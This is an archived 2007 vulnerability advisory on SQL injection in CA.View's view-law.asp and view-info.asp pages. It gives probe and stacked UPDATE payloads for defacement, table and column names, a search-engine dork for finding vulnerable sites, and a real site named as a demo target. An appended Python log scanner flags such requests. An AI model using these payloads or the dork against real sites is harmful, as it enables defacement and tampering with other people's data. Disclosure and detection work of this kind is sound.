CA.View/view-law.asp/view-info.asp SQL injection

2007-08-10T00:00:00
ID SECURITYVULNS:DOC:17748
Type securityvulns
Reporter Securityvulns
Modified 2007-08-10T00:00:00

Description

CA.View/view-law.asp/view-info.asp SQL injection

Credit : CodeXpLoder'tq

mail : codexploder[at]hotmail[dot]com

site : Biyosecurity.net,expw0rm.com

thx : BiyoSecurityTeam all members thx 3APA3A

spec.note : "Live The Life"

ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

1-) example.com/[path]/view-law.asp?lawid=(sql method)

1-) example.com/[path]/view-info.asp?informationid=(sql method)

2-) example.com/ca/view-law.asp?lawid=(sql method)

2-) example.com/ca/view-info.asp?informationid=(sql method)

ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

3-) example.com/[path]/view-law.asp?lawid=1'

3-) example.com/[path]/view-info.asp?informationid=1'

4-) example.com/ca/view-law.asp?lawid=1,2,3,4, 5+update+tbl+set+column='your text or meta code';--

4-) example.com/ca/view-info.asp?informationid=1,2,3,4, 5+update+tbl+set+column='your text or meta code';--

tbl(law) : tbllaw #tbl(info) :tblinformation

column : lawdetail #column :title

demo site : www.mrd.go.th/home

google : inurl:/ac/view-law.asp?lawid or /AC/view-info.asp?informationid
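
A defender-side check for the two parameters named in this advisory, added here as an example (it is not part of the original advisory or the vendor's code): it scans IIS W3C log lines for requests to view-law.asp and view-info.asp whose lawid or informationid value is not a plain integer. The log field order, the sample lines and the IP addresses are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Page name -> integer id parameter, both taken from the advisory above.
WATCHED = {"view-law.asp": "lawid", "view-info.asp": "informationid"}
PLAIN_INT = re.compile(r"\d{1,10}")

# Assumed W3C field order (constructed for this example; match your own #Fields line).
FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

def scan_iis_log(lines):
    """Return (c-ip, page, param, decoded value) for every non-integer id value."""
    hits = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue  # skip blank lines and W3C header directives
        cols = line.split()
        if len(cols) != len(FIELDS):
            continue  # unexpected layout: ignore rather than misparse
        rec = dict(zip(FIELDS, cols))
        page = rec["cs-uri-stem"].rsplit("/", 1)[-1].lower()
        param = WATCHED.get(page)
        if param is None or rec["cs-uri-query"] == "-":
            continue
        # parse_qsl percent-decodes and turns '+' into a space before the check.
        for name, value in parse_qsl(rec["cs-uri-query"], keep_blank_values=True):
            if name.lower() == param and not PLAIN_INT.fullmatch(value):
                hits.append((rec["c-ip"], page, param, value))
    return hits

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-08-10 10:00:01 192.0.2.10 GET /ca/view-law.asp lawid=12 200
2007-08-10 10:00:05 192.0.2.44 GET /ca/view-law.asp lawid=1' 500
2007-08-10 10:00:09 192.0.2.44 GET /ca/view-info.asp informationid=1,2,3,4,5+update+tbl+set+column='x';-- 200
2007-08-10 10:00:12 192.0.2.10 GET /ca/default.asp - 200
""".splitlines()

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```

The same allow-list test (digits only) is what the pages themselves should apply to lawid and informationid before the value reaches a query, alongside parameterized queries.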